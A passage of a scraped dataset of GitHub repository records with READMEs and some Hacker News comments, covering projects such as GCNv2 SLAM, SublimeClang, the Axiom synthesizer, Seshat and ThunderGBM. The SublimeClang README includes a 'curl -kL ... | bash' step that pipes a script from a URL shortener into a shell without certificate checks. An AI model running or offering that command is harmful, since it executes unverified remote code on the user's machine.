tree\nensembles.\n\n**NEW: Treelite is now used in the [Amazon Neo AI open source project](https://github.com/neo-ai/neo-ai-dlr).** See [here](https://aws.amazon.com/blogs/machine-learning/aws-launches-open-source-neo-ai-project-to-accelerate-ml-deployments-on-edge-devices/) for more information.\n\n**NEW: Treelite is now used in the [RAPIDS cuML project](https://github.com/rapidsai/cuml).**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jiexiong2016/GCNv2_SLAM", "link": "https://github.com/jiexiong2016/GCNv2_SLAM", "tags": [], "stars": 653, "description": "Real-time SLAM system with deep features", "lang": "C++", "repo_lang": "", "readme": "# GCNv2 SLAM\n\n## Introduction\nGCNv2 is a high-throughput variant of the Geometric Correspondence Network for performing RGB-D SLAM online on embedded platforms. We trained the binary descriptor in the same format with ORB (32 bytes) for the convenience of integration. In this implementation, we evaluate the motion estimation using a system built on top the [ORB-SLAM2], (https://github.com/raulmur/ORB_SLAM2). Thanks to the robustness of ORB-SLAM2, our system is able to achive reliable tracking perfomance on our drone platform in real-time. \n\n## Example\nOnline running performance with ORB and GCNv2 features:\n\nORB:\n\n![](orb.gif)\n\nGCNv2:\n\n![](gcn.gif)\n\n## Related Publications\n\n* **[GCNv2: Efficient Correspondence Prediction for Real-Time SLAM](https://arxiv.org/pdf/1902.11046.pdf)**, *J. Tang, L. Ericson, J. Folkesson and P. Jensfelt*, in arXiv:1902.11046, 2019\n* **[Geometric Correspondence Network for Camera Motion Estimation](http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8260906&isnumber=8214927)**, *J. Tang, J. Folkesson and P. Jensfelt*, RA-L and ICRA 2018\n\n# Dependencies\n\n## C++11 or C++0x Compiler\nWe use the new thread and chrono functionalities of C++11.\n\n## Pytorch\nWe use [Pytorch](https://github.com/pytorch/pytorch) C++ api(libtorch) for deloying the GCNv2. \nThe libtorch can be built as follows:\n```\ngit clone --recursive -b v1.0.1 https://github.com/pytorch/pytorch\ncd pytorch && mkdir build && cd build\npython ../tools/build_libtorch.py\n```\nThe built libtorch library is located at ```pytorch/torch/lib/tmp_install/``` in default.\n\n**Update: Have added support for master branch of pytorch or version larger than 1.0.1. For newer version, set ```TORCH_PATH``` to ```pytorch/torch/share/cmake/Torch```**\n\n**Required at least 1.0.1. Lower version of pytorch has cuDNN linking issue:https://github.com/pytorch/pytorch/issues/14033#issuecomment-455046353.**\n\n**Plese avoid using the pre-built version of libtorch since it will cause linking errors (due to [CXX11 ABI issue](https://github.com/pytorch/pytorch/issues/13541)).**\n\n## Pangolin\nWe use [Pangolin](https://github.com/stevenlovegrove/Pangolin) for visualization and user interface. Dowload and install instructions can be found at: https://github.com/stevenlovegrove/Pangolin.\n\n## OpenCV\nWe use [OpenCV](http://opencv.org) to manipulate images and features. Dowload and install instructions can be found at: http://opencv.org. \n\n**Required at least 2.4.3. Tested with OpenCV 2.4.11 and OpenCV 3.2**.\n\n## Eigen3\nRequired by g2o (see below). Download and install instructions can be found at: http://eigen.tuxfamily.org. \n\n**Required at least 3.1.0**.\n\n## DBoW2 and g2o (Included in Thirdparty folder)\nWe use modified versions of the [DBoW2](https://github.com/dorian3d/DBoW2) library to perform place recognition and [g2o](https://github.com/RainerKuemmerle/g2o) library to perform non-linear optimizations. Both modified libraries (which are BSD) are included in the *Thirdparty* folder.\n\n# Preparation\nClone the code\n```\ngit clone https://github.com/jiexiong2016/GCNv2_SLAM.git\n```\nThen build the project \n```\ncd GCNv2_SLAM\n./build.sh\n```\nMake sure to edit `build.sh` pointing to your local libtorch installation. Edit `run.sh` to check out how to run with GCNv2 or vanilla ORB. Check the `Network.md` for the network structure and [link](https://drive.google.com/file/d/1MJMroL5-tl0b9__-OiCfxFP9K6X8kvTT/view) for trained models.\n\n# Image resolution\n**Update** Set \"FULL_RESOLUTION=1\" and use \"gcn2_640x480.pt\" to test with image resolution \"640x480\" intead. The input image size should be consitent with the model to be used.\n\n# Demonstration video\n\n[![YouTube video thumbnail](https://i.ytimg.com/vi/pz-gdnR9tAM/hqdefault.jpg)](https://www.youtube.com/watch?v=pz-gdnR9tAM)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "quarnster/SublimeClang", "link": "https://github.com/quarnster/SublimeClang", "tags": [], "stars": 653, "description": "C/C++/ObjC/ObjC++ autocompletions and code navigation", "lang": "C++", "repo_lang": "", "readme": "= Plugin discontinued =\n\n** I don't intend to continue development of this plugin, so I've disabled the issues page. If something is broken, submit a pull request and I'll consider merging it. The issue history is [[https://github.com/quarnster/SublimeClang/tree/master/issues|archived]] should you want to poke in it.\n\n** Eventually SublimeClang will be replaced by https://github.com/quarnster/completion, but as I don't code much in clang supported languages these days it's not a very high priority for me personally.\nIf you'd like to see it move along quicker, submit a pull request in that project and/or participate in its discussions.\n\n=== Description ===\nClang plugin for Sublime Text 2 providing auto complete suggestions for C/C++/ObjC/ObjC++. It'll also optionally parse the code as it's typed and show errors and warnings.\n\n=== Known issues and feature requests ===\nPlease go [[https://github.com/quarnster/SublimeClang/issues?sort=created&direction=desc&state=open|here]] to see the currently known issues and feature request, or to file a new.\n\n=== Prerequisites ===\n # To use the clang static analyzer you need to have clang installed and in your path. The other functionality should work without having the clang binaries installed.\n\n=== Additional Prerequisites (Linux Only)===\n # [[http://sublimetext.userecho.com/topic/85126-ctypes-cant-be-imported-in-linux/|ctypes can't be imported]] in the Linux version of Sublime Text 2 right now. This can however be worked around easily with the help of pythonbrew:\n ## curl -kL http://xrl.us/pythonbrewinstall | bash\n ## source \"$HOME/.pythonbrew/etc/bashrc\"\n ## pythonbrew install --configure=\"--enable-unicode=ucs4\" 2.6\n ## ln -s $HOME/.pythonbrew/pythons/Python-2.6/lib/python2.6/ /lib/python2.6\n # If you install SublimeClang via Package Control, it seems [[http://github.com/quarnster/SublimeClang/issues/97|libcache and libclang will be deleted]] when the package is updated, so it's recommended that you manually install the plugin by using the git commands listed in the Installation section.\n # Once SublimeClang has been installed, libcache will have to be compiled:\n ## cd src\n ## mkdir build\n ## cd build\n ## cmake ..\n ## make\n * Note that if a usable libclang library isn't found, it will be downloaded and built as part of the build process.\n\nIf you run into any issues, please have a look at issue [[https://github.com/quarnster/SublimeClang/issues/35|#35]] for additional notes or to ask for help.\n\n=== Installation ===\n # The easiest way to install SublimeClang is via the excellent Package Control Plugin. Note that SublimeClang doesn't install correctly with version v1.6.3\n of Package Control; either use the latest testing version or (if it exists) \n a newer stable version of Package Control.\n ## See http://wbond.net/sublime_packages/package_control#Installation\n ### Once package control has been installed, bring up the command palette (cmd+shift+P or ctrl+shift+P)\n ### Type Install and select \"Package Control: Install Package\"\n ### Select SublimeClang from the list. Package Control will keep it automatically updated for you\n ## If you don't want to use package control, you can manually install it\n ### Go to your packages directory and type:\n #### git clone --recursive https://github.com/quarnster/SublimeClang SublimeClang\n #### After this you'll have to Compile libcache as described in the Additional Prerequisites (Linux Only) section\n ### To update run the following command:\n #### git pull && git submodule foreach --recursive git pull origin master\n # Back in the editor, open up the command palette by pressing cmd+shift+P or ctrl+shift+P\n # Type SublimeClang and open up the settings file you want to modify with any include directories or other options you want to provide to clang.\n\n=== Usage ===\nAfter installation, suggestions from clang should be provided when triggering the autocomplete operation in Sublime Text 2. By default it'll inhibit the Sublime Text 2 built in word completion, but the inhibition can be disabled by setting the configuration option \"inhibit_sublime_completions\" to false.\n\nIf you modify a file that clang can compile and if there are any errors or warnings in that file, you should see the output in the output panel, as well as having the warnings and errors marked in the source file.\n\nThere's also the following key-bindings (tweak Default.sublime-keymaps to change):\n\n |alt+d,alt+d|Go to the parent reference of whatever is under the current cursor position|\n |alt+d,alt+i|Go to the implementation|\n |alt+d,alt+b|Go back to where you were before hitting alt+d,alt+d or alt+d,alt+i|\n |alt+d,alt+c|Clear the cache. Will force all files to be reparsed when needed|\n |alt+d,alt+w|Manually warm up the cache|\n |alt+d,alt+r|Manually reparse the current file|\n |alt+d,alt+t|Toggle whether Clang completion is enabled or not. Useful if the complete operation is slow and you only want to use it selectively|\n |alt+d,alt+p|Toggle the Clang output panel|\n |alt+d,alt+e|Go to next error or warning in the file|\n |alt+shift+d,alt+shift+e|Go to the previous error or warning in the file|\n |alt+d,alt+s|Run the Clang static analyzer on the current file|\n |alt+d,alt+o|Run the Clang static analyzer on the current project|\n |alt+d,alt+f|Toggle whether fast (but possibly inaccurate) completions are used or not|\n\n=== Show your support ===\n\n[[https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPSEP2BHMLYEW|Donate]]\n\n=== License ===\nThis plugin is using the zlib license\n\n{{{\nCopyright (c) 2011-2012 Fredrik Ehnbom\n\nThis software is provided 'as-is', without any express or implied\nwarranty. In no event will the authors be held liable for any damages\narising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not\n claim that you wrote the original software. If you use this software\n in a product, an acknowledgment in the product documentation would be\n appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n misrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source\n distribution.\n}}}\n\n---------------------------------------------------------\n\nAnd in addition to this, clang itself is using the following license:\n\n{{{\nUniversity of Illinois/NCSA\nOpen Source License\n\nCopyright (c) 2003-2012 University of Illinois at Urbana-Champaign.\nAll rights reserved.\n\nDeveloped by:\n\n LLVM Team\n\n University of Illinois at Urbana-Champaign\n\n http://llvm.org\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal with\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimers.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimers in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the names of the LLVM Team, University of Illinois at\n Urbana-Champaign, nor the names of its contributors may be used to\n endorse or promote products derived from this Software without specific\n prior written permission.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nCONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE\nSOFTWARE.\n}}}\n\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "monadgroup/axiom", "link": "https://github.com/monadgroup/axiom", "tags": ["synthesizer", "demoscene", "vst", "dsp", "rust", "c-plus-plus", "llvm"], "stars": 653, "description": "A powerful realtime node-based audio synthesizer.", "lang": "C++", "repo_lang": "", "readme": "# Axiom [![Build Status](https://travis-ci.org/monadgroup/axiom.svg?branch=master)](https://travis-ci.org/monadgroup/axiom)\n\n![Picture of a synth built in Axiom](axiom.png)\n\n> A synth built in the current version of Axiom\n\nAxiom is an extremely flexible node-based realtime audio synthesizer. It was originally designed for size-constrained environments such as PC intros in the demoscene, but is entirely open source and is becoming an excellent free tool for any musician.\n\n**Axiom's a bit afk at the moment, I've been preparing for a big redesign/rewrite but haven't had much time to put towards it or bugfixing recently. Contributions are still welcome as always :)**\n\nFeatures:\n\n - Musician-friendly (ie knobs and sliders) interface\n - Highly customizable and flexible through a node editor and Maxim, a custom scripting language\n - Export to replayer with no dependencies (not even the standard library)\n - Use any DAW with VSTi support for note editing and automation\n\nThere are currently pre-packaged versions available for Windows and macOS (alpha, let us know of any issues) on [the Releases page](https://github.com/monadgroup/axiom/releases). Stay tuned for Linux builds!\n\n**[Usage Guide](https://github.com/monadgroup/axiom/blob/master/docs/UsageGuide.md) \u00b7 [Example Projects](https://github.com/monadgroup/axiom/tree/master/examples) \u00b7 [Downloads & Release Notes](https://github.com/monadgroup/axiom/releases)**\n\n## Backends\n\nAxiom currently supports the following audio backends:\n\n - Standalone editor - doesn't require a DAW or host, allowing experimentation with the editor. MIDI can be input from a MIDI device, or by pressing keys on a regular computer keyboard.\n - VST2 - runs in a VST host as an instrument or effect, with support for side-chaining and multiple inputs/outputs.\n - _Other backends such as VST3 are planned_\n\n## Building\n\nAxiom is built with CMake. The build process depends on Cargo, Qt 5.10+, LLVM 6, and the VST 2 SDK (for the VST2 backend), so make sure those are installed and setup correctly. You can download the VST 2 SDK [from Steinberg's website](http://steinberg.net/sdk_downloads/vstsdk366_27_06_2016_build_61.zip), the other libraries can likely be found in your system's package manager, or from their respective websites.\n\nOnce Cargo, Qt, LLVM, and the VST SDK are installed, go to the directory where you'd like to build Axiom to. Then run the following command:\n\n```\ncmake ../path/to/source -DVST2_SDK_ROOT=/path/to/vst/sdk\n```\n\nIf you want to build it statically-linked, pass the `AXIOM_STATIC_LINK` flag:\n\n```\ncmake ../path/to/source -DAXIOM_STATIC_LINK=ON -DVST2_SDK_ROOT=/path/to/vst/sdk\n```\n\nCMake will setup files necessary for building. If this fails, make sure you've got Cargo, Qt, LLVM, and the VST SDK installed correctly. Once complete, you can choose which backend to build:\n\n### VST2 Instrument & VST2 Effect\n\n* To build the VST2 instrument backend, use the following command. Make sure you provided a path to the VST SDK in the command above.\n```\ncmake --build ./ --target axiom_vst2_instrument\n```\n\n* You can also build the VST2 effect with the `axiom_vst2_effect` target.\n```\ncmake --build ./ --target axiom_vst2_effect\n```\n\n### Standalone\n\n* To build the standalone version as an executable, use the following command. The standalone optionally depends on PortAudio and PortMidi: without PortAudio nodes will not be simulated and audio will not be output, without PortMidi MIDI devices cannot be used for input.\n\n\n```\ncmake --build ./ --target axiom_standalone\n```\n\n## Development\n\nAxiom is comprised of several components:\n\n - The VST Editor, written with Qt and the VST SDK. This is the only part the user directly interacts with, and must be\n OS-independent. \n - The Maxim language compiler and runtime, written in Rust with LLVM and statically linked into the editor.\n - The replayer, _coming soon_.\n\n## License\n\nLicensed under the MIT license. See the LICENSE file in the repository for more details.\n", "readme_type": "markdown", "hn_comments": "Looks really cool, and similar to Audulus http://audulus.com/Hey friends!This is a project I\u2019ve been working on since the start of the year. We\u2019ve just released 0.4.0, so I figured now would be a nice time to start making it a bit more public. There\u2019s a bunch of interesting tech under the hood which I thought you all would definitely be interested in :)Axiom\u2019s a project that grew out of my third try at building a realtime software synthesizer for 64k intros in the demoscene. You can\u2019t really fit an mp3 file in an executable that small and expect for it to sound any good, so instead we synthesize the audio and play it in realtime. A few other groups have written synthesizers for 4k and 64k productions, however I built this for two reasons: I wanted to make one myself, and I wanted to try some interesting things with combining node graphs and basic scripting. At some point, however, I realized that this could actually be a really useful tool for any musician to have, since it really flips things on its head and allows much more control than just stringing together a bunch of plugins (the question is, of course, do people who make music _want_ this control - I'm not sure on the answer yet).Technology-wise, Axiom compiles 'node surfaces' with LLVM (no interpreters here, the code has to run comfortably 44100 times per second!). The editor, written in C++ with Qt, builds a MIR and passes it into the compiler, written in Rust. This was my first large project in C++ and first project in Rust... ultimately I think the Rust learning curve has definitely been worth it, as it's by far the stablest part of the program!Ultimately I\u2019m hoping to somehow be able to turn this into a real product, possibly by offering what you see as the core open-source software and then building on it, into something like a DAW or plugin for procedural audio in game engines (which a few people have suggested to me, and I think would be a really cool application of the technology!).Check it out, let me know what you think (either here, or shoot me an email, chat on twitter, etc), ask questions, build something cool, have fun!Overall looks pretty neat. I\u2019m a big fan of dark themes, but I think this one takes it a bit too far. I\u2019m having trouble reading the text which doesn\u2019t contrast well against the background. Consider lightening some of the elements.Awesome, I've always wanted to make something like this myself but never came around to do it!It would be really neat if someone combined this with a very simple sequencer/tracker to create and manipulate tunes, which could then be dropped in (sequencer + synthesizer) directly into projects. It could be a quick and easy way to add music to small-scale retro game projects, for example.The VSTi support is pretty sweet-it pretty much changes this sort of thing from toy to tool.Looks cool, looking forward to playing around with it!If it is compiling, can it also export code/libraries that can be embedded in other projects, or is the way to go to embed the entire thing? Since you mention demos as a target group I'd guess the first, but it isn't entirely clear.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "falvaro/seshat", "link": "https://github.com/falvaro/seshat", "tags": [], "stars": 652, "description": "Handwritten math expression parser", "lang": "C++", "repo_lang": "", "readme": "SESHAT: Handwritten math expression parser\n==========================================\n*Seshat* is an open-source system for recognizing handwritten\nmathematical expressions. Given a sample represented as a sequence of\nstrokes, the parser is able to convert it to LaTeX or other formats\nlike InkML or MathML. You can see an example of application of this\nparser in\n\nhttp://cat.prhlt.upv.es/mer/\n\nwhere *seshat* is the underlying engine.\n\nThis parser has been developed by Francisco \u00c1lvaro as part of his PhD\nthesis while he was a member of the [PRHLT research center] [1] at\n[Universitat Polit\u00e8cnica de Val\u00e8ncia] [2].\n\n*Seshat* represents a state-of-the-art system that has participated in\nseveral [international competitions] [3], and it was awarded the best\nsystem trained on the competition dataset in:\n\n- Mouch\u00e8re H., Viard-Gaudin C., Zanibbi R., Garain U.\n *ICFHR 2014 Competition on Recognition of On-line Handwritten \n Mathematical Expressions (CROHME 2014)*.\n International Conference on Frontiers in Handwriting Recognition (ICFHR),\n Crete Island, Greece (2014)\n\nThe math expression recognition model that *seshat* implements is described in:\n\n- Francisco \u00c1lvaro, Joan-Andreu S\u00e1nchez and Jos\u00e9-Miguel Bened\u00ed.\n *An Integrated Grammar-based Approach for Mathematical Expression Recognition*.\n Pattern Recognition, pp. 135-147, 2016\n\nand it is the main part of my PhD thesis. \n\n - Francisco \u00c1lvaro (advisors: Joan-Andreu S\u00e1nchez and Jos\u00e9-Miguel Bened\u00ed).\n [Mathematical Expression Recognition based on Probabilistic Grammars][13].\n Doctor of Philosophy in Computer Science,\n Universitat Polit\u00e8cnica de Val\u00e8ncia, 2015.\n\nLicense\n-------\n*Seshat* is released under the [GNU General Public License version 3.0 (GPLv3)] [5]\n\n\nDistribution details\n--------------------\n*Seshat* is written in C++ and should work on any platform, although\nit has only been tested in Linux.\n\nThis software integrates the open-source [RNNLIB library] [4]\nfor symbol classification. The code of RNNLIB has been slightly\nmodified and directly integrated in *seshat*, thus, it is not\nnecessary to download it. However, it requires the [Boost C++\nLibraries] [6] (headers only).\n\nFinally, the parser accepts input files in two formats: InkML and\nSCGINK. There is a example of each format in folder\n\"SampleMathExps\". *Seshat* uses the [Xerces-c library] [7] for parsing\nInkML in C++.\n\n\n\nInstallation\n--------------------\n*Seshat* is written in C++ and it only requires Makefile and g++ to\ncompile it. Once the required tools and libraries are available, you\ncan proceed with the installation of *seshat* as follows:\n\n 1. Obtain the package using git:\n\n $ git clone https://github.com/falvaro/seshat.git\n\n Or [download it as a zip file] [8]\n\n 2. Go to the directory containing the source code.\n\n 3. If the include files of boost libraries are not in the path, add\n it to the *FLAGS* variable in the file *Makefile* (\"-I/path/to/boost/\").\n\n 4. Compile *seshat*\n\n $ make\n\nAs a result, you will have the executable file \"*seshat*\" ready to\nrecognize handwritten math expressions.\n\n\nExample of usage\n----------------\nRun *seshat* without arguments and it will display the command-line interface:\n\n```\n$ Usage: ./seshat -c config -i input [-o output] [-r render.pgm]\n\n -c config: set the configuration file\n -i input: set the input math expression file\n -o output: save recognized expression to 'output' file (InkML format)\n -r render: save in 'render' the image representing the input expression (PGM format)\n -d graph: save in 'graph' the description of the recognized tree (DOT format)\n```\n\nThere are two example math expressions in folder \"SampleMathExps\". The\nfollowing command will recognize the expression `(x+y)^2` encoded in\n\"exp.scgink\"\n\n\t$ ./seshat -c Config/CONFIG -i SampleMathExps/exp.scgink -o out.inkml -r render.pgm -d out.dot\n\nThis command outputs several information through the standard output, where the last line will\nprovide the LaTeX string of the recognized math expression. Furthermore:\n\n- An image representation of the input strokes will be rendered in \"render.pgm\".\n\n- The InkML file of the recognized math expression will be saved in \"out.inkml\".\n\n- The derivation tree of the expression provided as a graph in DOT\n format will be saved in \"out.dot\". The representation of the graph\n in, for example, postscript format can be obtained as follows\n\n \t $ dot -o out.ps out.dot -Tps\n\nIt should be noted that only options \"-c\" and \"-i\" are mandatory.\n\n\nCitations\n---------\nIf you use *seshat* for your research, please cite the following reference:\n\n
\n@article{AlvaroPR16,\ntitle = \"An integrated grammar-based approach for mathematical expression recognition\",\nauthor = \"Francisco \\'Alvaro and Joan-Andreu S\\'anchez and Jos\\'e-Miguel Bened\\'{\\i}\",\njournal = \"Pattern Recognition\",\nvolume = \"51\",\npages = \"135 - 147\",\nyear = \"2016\",\nissn = \"0031-3203\"\n}\n
\n\n\nWhy *seshat*?\n-------------\n*Seshat* was the [Goddess of writing] [9] according to Egyptian\nmythology, so I liked this name for a handwritten math expression\nparser. I found out about *seshat* because my colleague of the PRHLT\n[Daniel Ortiz-Mart\u00ednez] [10] developed [Thot] [11], a great\nopen-source toolkit for statistical machine translation; and Thot is\nthe [God of Knowledge] [12] according to Egyptian mythology.\n\n\n\n\n[1]: http://www.prhlt.upv.es/\n[2]: http://www.upv.es/\n[3]: http://www.isical.ac.in/~crohme/\n[4]: http://sourceforge.net/projects/rnnl/\n[5]: http://www.gnu.org/licenses/gpl-3.0.html\n[6]: http://www.boost.org/\n[7]: http://xerces.apache.org/xerces-c/\n[8]: https://github.com/falvaro/seshat/archive/master.zip\n[9]: http://en.wikipedia.org/wiki/Seshat\n[10]: https://www.prhlt.upv.es/page/member?user=dortiz\n[11]: https://github.com/daormar/thot\n[12]: http://en.wikipedia.org/wiki/Thoth\n[13]: http://hdl.handle.net/10251/51665\n", "readme_type": "markdown", "hn_comments": "Hehe, guess I'm not the only one who likes using ancient gods as names for technology. My backup server is called Seshat, since she's seen as a record keeper.The symbol recognition is really good, but it does not handle positioning and relative sizes that well: http://imgur.com/7FCr6TDThe link text is something of a garden path sentence... At first I thought it was a handwritten parser for math expressions, not a parser for handwritten math expressions!Works great when it does, fails miserably when it doesn't.For example, it doesn't seem to know about matrices. That's fine, but when you enter one, it comes up with spectacular failures. I got integrals (probably because an integral sign somewhat matches the 'opening parenthesis' of a matrix) i^i, cases where it almost randomly stringed together parts of a matrix, etc.This is great and worked very well on the few examples I tried. I wonder how it would work with a photo - author, has it been tried?Something seems off here: http://i.imgur.com/qBJCIqh.pngI have been using the free app \"MathPad\" on iPhone for a few years now. It does the same thing (A LOT better). But the free version does not allow export to LaTeX, so this open source alternative is more than welcome.This reminds me of work by one of my professors at Rochester Institute of Technology (Dr. Richard Zanibbi). There is an application called Freehand Formula Entry System (FFES) available on his website for download (GPL source as well) [1]. He also published a paper on it titled \"Recognition and Retrieval of Mathematical Expressions\" (2012) [2].[1] https://www.cs.rit.edu/~rlaz/ffes/[2] https://www.cs.rit.edu/~rlaz/files/mathSurvey.pdfThis is an awesome project! The demo could use some work, though. It's pretty hard to write legibly with a mouse, so I tried to open it on my phone, but the canvas doesn't work properly when zoomed in. (using Chrome on Android)I can't seem to make it recognize logs with arbitrary bases:http://imgur.com/a/GkW9EThis works rather well! I tried it on my iPhone. Simple expressions work just fine. I can't seem to make finite integrals work though.Wow, just skimmed through the PhD thesis that includes this work[1] and it's impressively thorough. The algorithm supports both vector and bitmap input, and uses Recursive Neural Networks and probabilistic grammars to disambiguate the symbols. Their open source implementation is in C++, under GPLv3 license.[1] https://riunet.upv.es/handle/10251/51665I've tried the web demo and for me it works quite well. In my case, definite integrals work except for the \"dx\" which gets interpreted as \"d_x\" for no apparent reason.Some years ago I did some work in this direction which might be relevant: it only involved the formula structure analysis with an improved version of the DRACULAE algorithm from Zanibbi et al. (also cited in SESHAT's paper), starting from given characters (no symbol recognition except for hand-drawn fraction bars) freely positioned/scaled on the page.\nIt delivers layout/presentation markup (MathML, DRACULAE tree), semantic encoding (OpenMath), natural language (English) and speech output, all in Javascript:\nhttp://matracas.org/tacto/At the time, speech worked in Firefox, Chrome and even Safari, but nowadays only works in Firefox. I don't remember whether it worked in Opera but all other features did.[Edit to add:] My application does not implement matrices either, just arithmetics including exponents, subindexes, and fractions.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Xtra-Computing/thundergbm", "link": "https://github.com/Xtra-Computing/thundergbm", "tags": ["cuda", "gpu", "gbdt", "random-forest", "machine-learning"], "stars": 652, "description": "ThunderGBM: Fast GBDTs and Random Forests on GPUs", "lang": "C++", "repo_lang": "", "readme": "[![Documentation Status](https://readthedocs.org/projects/thundergbm/badge/?version=latest)](https://thundergbm.readthedocs.org)\n[![GitHub license](https://img.shields.io/badge/license-apache2-yellowgreen)](./LICENSE)\n[![GitHub issues](https://img.shields.io/github/issues/xtra-computing/thundergbm.svg)](https://github.com/xtra-computing/thundergbm/issues)\n[![PyPI version](https://badge.fury.io/py/thundergbm.svg)](https://badge.fury.io/py/thundergbm)\n[![Downloads](https://pepy.tech/badge/thundergbm)](https://pepy.tech/project/thundergbm)\n\n
\n\n\n\n
\n\n[Documentations](docs/index.md) | [Installation](docs/how-to.md#how-to-install-thundergbm) | [Parameters](docs/parameters.md) | [Python (scikit-learn) interface](python/README.md)\n\n## What's new?\nThunderGBM won 2019 Best Paper Award from IEEE Transactions on Parallel and Distributed Systems by the IEEE Computer Society Publications Board (1 out of 987 submissions, for the work \"Zeyi Wen^, Jiashuai Shi*, Bingsheng He, Jian Chen, Kotagiri Ramamohanarao, and Qinbin Li*, Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training , IEEE Transactions on Parallel and Distributed Systems, vol. 30, no. 12, 2019, pp. 2706-2717.\"). see more details: [Best Paper Award Winners from IEEE](https://www.computer.org/publications/best-paper-award-winners), \n[News from NUS School of Computing](https://www.comp.nus.edu.sg/news/2020-ieee-tpds/)\n\n\n## Overview\nThe mission of ThunderGBM is to help users easily and efficiently apply GBDTs and Random Forests to solve problems. ThunderGBM exploits GPUs to achieve high efficiency. Key features of ThunderGBM are as follows.\n* Often by 10x times over other libraries.\n* Support Python (scikit-learn) interfaces.\n* Supported Operating System(s): Linux and Windows.\n* Support classification, regression and ranking.\n\n**Why accelerate GBDT and Random Forests**: A [survey](https://www.kaggle.com/amberthomas/kaggle-2017-survey-results) conducted by Kaggle in 2017 shows that 50%, 46% and 24% of the data mining and machine learning practitioners are users of Decision Trees, Random Forests and GBMs, respectively. \n\n\nGBDTs and Random Forests are often used for creating state-of-the-art data science solutions. We've listed three winning solutions using GBDTs below. Please check out the [XGBoost website](https://github.com/dmlc/xgboost/blob/master/demo/README.md#machine-learning-challenge-winning-solutions) for more winning solutions and use cases. Here are some example successes of GDBTs and Random Forests:\n\n- Halla Yang, 2nd place, [Recruit Coupon Purchase Prediction Challenge](https://www.kaggle.com/c/coupon-purchase-prediction), [Kaggle interview](http://blog.kaggle.com/2015/10/21/recruit-coupon-purchase-winners-interview-2nd-place-halla-yang/).\n- Owen Zhang, 1st place, [Avito Context Ad Clicks competition](https://www.kaggle.com/c/avito-context-ad-clicks), [Kaggle interview](http://blog.kaggle.com/2015/08/26/avito-winners-interview-1st-place-owen-zhang/).\n- Keiichi Kuroyanagi, 2nd place, [Airbnb New User Bookings](https://www.kaggle.com/c/airbnb-recruiting-new-user-bookings), [Kaggle interview](http://blog.kaggle.com/2016/03/17/airbnb-new-user-bookings-winners-interview-2nd-place-keiichi-kuroyanagi-keiku/).\n\n## Getting Started\n\n### Prerequisites\n* cmake 2.8 or above \n * gcc 4.8 or above for Linux | [CUDA](https://developer.nvidia.com/cuda-downloads) 9 or above\n * Visual C++ for Windows | CUDA 10\n\n### Quick Install\n* For Linux with CUDA 9.0\n * `pip install thundergbm`\n \n* For Windows (64bit)\n - Download the Python wheel file (for Python3 or above)\n \n * [CUDA 10.0 - Win64](https://github.com/Xtra-Computing/thundergbm/blob/master/python/dist/thundergbm-0.3.12-py2-none-win_amd64.whl)\n\n - Install the Python wheel file\n \n * `pip install thundergbm-0.3.4-py3-none-win_amd64.whl`\n* Currently only support python3\n* After you have installed thundergbm, you can import and use the classifier (similarly for regressor) by:\n```python\nfrom thundergbm import TGBMClassifier\nclf = TGBMClassifier()\nclf.fit(x, y)\n```\n### Build from source\n```bash\ngit clone https://github.com/zeyiwen/thundergbm.git\ncd thundergbm\n#under the directory of thundergbm\ngit submodule init cub && git submodule update\n```\n### Build on Linux (build instructions for [Windows](docs/how-to.md#build-on-windows))\n```bash\n#under the directory of thundergbm\nmkdir build && cd build && cmake .. && make -j\n```\n\n### Quick Start\n```bash\n./bin/thundergbm-train ../dataset/machine.conf\n./bin/thundergbm-predict ../dataset/machine.conf\n```\nYou will see `RMSE = 0.489562` after successful running.\n\nMacOS is not supported, as Apple has [suspended support](https://www.forbes.com/sites/marcochiappetta/2018/12/11/apple-turns-its-back-on-customers-and-nvidia-with-macos-mojave/#5b8d3c7137e9) for some NVIDIA GPUs. We will consider supporting MacOS based on our user community feedbacks. Please stay tuned.\n\n## How to cite ThunderGBM\nIf you use ThunderGBM in your paper, please cite our work ([TPDS](https://zeyiwen.github.io/papers/tpds19_gpugbdt.pdf) and [JMLR](https://github.com/Xtra-Computing/thundergbm/blob/master/thundergbm-full.pdf)).\n```\n@ARTICLE{8727750,\n author={Z. {Wen} and J. {Shi} and B. {He} and J. {Chen} and K. {Ramamohanarao} and Q. {Li}},\n journal={IEEE Transactions on Parallel and Distributed Systems}, \n title={Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training}, \n 